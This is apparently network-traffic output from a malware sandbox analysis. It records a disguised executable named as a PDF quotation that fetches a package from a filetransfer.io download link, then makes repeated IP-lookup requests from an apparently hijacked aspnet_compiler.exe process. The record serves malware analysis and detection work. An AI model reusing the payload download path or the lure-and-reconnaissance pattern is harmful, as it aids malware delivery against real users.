Nov 21, 2024 13:09:06.755542994 CET	443	49829	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:06.755717993 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:06.756386995 CET	49829	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:06.761121035 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:06.880889893 CET	80	49835	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:06.881016970 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:06.881289959 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:07.000760078 CET	80	49835	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:07.977415085 CET	80	49835	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:07.979072094 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:07.979091883 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:07.979279041 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:07.979628086 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:07.979640007 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:08.026369095 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:09.288507938 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:09.295325041 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:09.295345068 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:09.760966063 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:09.761015892 CET	443	49836	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:09.761112928 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:09.761734962 CET	49836	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:09.765573025 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:09.766779900 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:09.885690928 CET	80	49835	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:09.885762930 CET	49835	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:09.886785984 CET	80	49842	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:09.886857986 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:09.887140036 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:10.006736040 CET	80	49842	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:10.984077930 CET	80	49842	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:10.987660885 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:10.987713099 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:10.987793922 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:10.988198996 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:10.988219976 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:11.041862011 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.243922949 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:12.245517015 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:12.245619059 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:12.704588890 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:12.705487013 CET	443	49846	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:12.705595970 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:12.705910921 CET	49846	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:12.710544109 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.711057901 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.830887079 CET	80	49850	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:12.831038952 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.831213951 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.831430912 CET	80	49842	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:12.831511974 CET	49842	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:12.950998068 CET	80	49850	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:13.972841024 CET	80	49850	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:13.974889040 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:13.974936962 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:13.975039959 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:13.975404024 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:13.975429058 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:14.026287079 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.188596010 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:15.190309048 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:15.190391064 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:15.636693954 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:15.636763096 CET	443	49855	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:15.636832952 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:15.637535095 CET	49855	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:15.642062902 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.643172026 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.762653112 CET	80	49850	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:15.762748003 CET	80	49860	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:15.762805939 CET	49850	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.762856007 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.763046026 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:15.882487059 CET	80	49860	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:16.899889946 CET	80	49860	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:16.901448011 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:16.901540041 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:16.901624918 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:16.901868105 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:16.901905060 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:16.948116064 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.210544109 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:18.212028027 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:18.212074995 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:18.683924913 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:18.683979988 CET	443	49862	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:18.684092045 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:18.684647083 CET	49862	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:18.688395023 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.689444065 CET	49868	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.811160088 CET	80	49868	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:18.811363935 CET	49868	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.811547041 CET	49868	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.813613892 CET	80	49860	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:18.813695908 CET	49860	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:18.931056976 CET	80	49868	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:19.974071980 CET	80	49868	193.122.130.0	192.168.2.5
Nov 21, 2024 13:09:19.975653887 CET	49872	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:19.975734949 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:19.975815058 CET	49872	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:19.976115942 CET	49872	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:19.976151943 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:20.026278973 CET	49868	80	192.168.2.5	193.122.130.0
Nov 21, 2024 13:09:21.237103939 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:21.238950014 CET	49872	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:21.238981009 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:21.696135998 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:21.696230888 CET	443	49872	188.114.97.3	192.168.2.5
Nov 21, 2024 13:09:21.696352959 CET	49872	443	192.168.2.5	188.114.97.3
Nov 21, 2024 13:09:21.696943998 CET	49872	443	192.168.2.5	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 13:07:59.368355989 CET	52258	53	192.168.2.5	1.1.1.1
Nov 21, 2024 13:07:59.601717949 CET	53	52258	1.1.1.1	192.168.2.5
Nov 21, 2024 13:08:03.286274910 CET	56570	53	192.168.2.5	1.1.1.1
Nov 21, 2024 13:08:03.522113085 CET	53	56570	1.1.1.1	192.168.2.5
Nov 21, 2024 13:08:56.703119040 CET	61132	53	192.168.2.5	1.1.1.1
Nov 21, 2024 13:08:56.990396976 CET	53	61132	1.1.1.1	192.168.2.5
Nov 21, 2024 13:08:58.622854948 CET	57012	53	192.168.2.5	1.1.1.1
Nov 21, 2024 13:08:58.856762886 CET	53	57012	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 13:07:59.368355989 CET	192.168.2.5	1.1.1.1	0x91cd	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:03.286274910 CET	192.168.2.5	1.1.1.1	0x1a64	Standard query (0)	s24.filetransfer.io	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.703119040 CET	192.168.2.5	1.1.1.1	0xec52	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:58.622854948 CET	192.168.2.5	1.1.1.1	0x1b14	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 13:07:59.601717949 CET	1.1.1.1	192.168.2.5	0x91cd	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:07:59.601717949 CET	1.1.1.1	192.168.2.5	0x91cd	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:03.522113085 CET	1.1.1.1	192.168.2.5	0x1a64	No error (0)	s24.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:03.522113085 CET	1.1.1.1	192.168.2.5	0x1a64	No error (0)	s24.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:56.990396976 CET	1.1.1.1	192.168.2.5	0xec52	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:58.856762886 CET	1.1.1.1	192.168.2.5	0x1b14	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 21, 2024 13:08:58.856762886 CET	1.1.1.1	192.168.2.5	0x1b14	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s24.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.96.3	80	2132	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:07:59.739715099 CET	95	OUT	GET /data-package/u7ghXEYp/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Nov 21, 2024 13:08:01.047128916 CET	998	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 21 Nov 2024 12:08:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/u7ghXEYp/download CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86K66uUr70t84Mpaer7wGq7051D%2FIw4%2BzyP44r5ykbdlIHysCH%2BJrXqQF1Ga2k2lfR5T7dCzRjmO%2FxhH0hV1W6vaeCbhq5Coch1a%2Fq4jC79acL2DRATWzb0cEoNduPccsYs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e60900c5b628c95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49806	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:08:57.119740009 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:08:58.261223078 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:08:58 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d6fa511f36e442f4bf643ddd1a59270e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 13:08:58.266613007 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 13:08:58.595220089 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:08:58 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd134e119d260dc91dc7f959ebfabdc0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 21, 2024 13:09:00.595020056 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 13:09:02.048403025 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dc301dab968120e78fb828f0537b9041 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49825	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:03.894653082 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 21, 2024 13:09:05.040397882 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e827943a360eaa0f90041d71ea25e715 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49835	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:06.881289959 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:09:07.977415085 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2a517c89b1427fde7f3b7472a807827a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49842	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:09.887140036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:09:10.984077930 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 962254131a2203390df4c48747a7cb13 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49850	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:12.831213951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:09:13.972841024 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2d02cc122c82da609ad62c91c8d261c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49860	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:15.763046026 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:09:16.899889946 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cb429b732c42b6495007c121dd86a3de Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49868	193.122.130.0	80	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 13:09:18.811547041 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 21, 2024 13:09:19.974071980 CET	320	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 12:09:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 335b2893d5f6214bc079430de1419a36 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.96.3	443	2132	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 12:08:02 UTC	95	OUT	GET /data-package/u7ghXEYp/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-11-21 12:08:03 UTC	1241	IN	HTTP/1.1 302 Found Date: Thu, 21 Nov 2024 12:08:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=94cu637ud9eh1bp11v7i2pf1l6; expires=Thu, 05-Dec-2024 12:08:02 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s24.filetransfer.io/storage/download/72vwG3nYeuAb CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxTSyx1o4AMRupGD4IJ5%2FkE1WJsKoZQLY8PngPWAy1aNmVusRQQ0rqwrqk3H86b%2B1cDG7ZqNYLIBPtbwWboGz9PxV24a3i%2BOw8pQspPgztC7zPCsn3p4xYvE0FB4L1OxNh0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6090188c1841d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=1509824&cwnd=233&unsent_bytes=0&cid=5b3a85d7284b2135&ts=908&x=0"
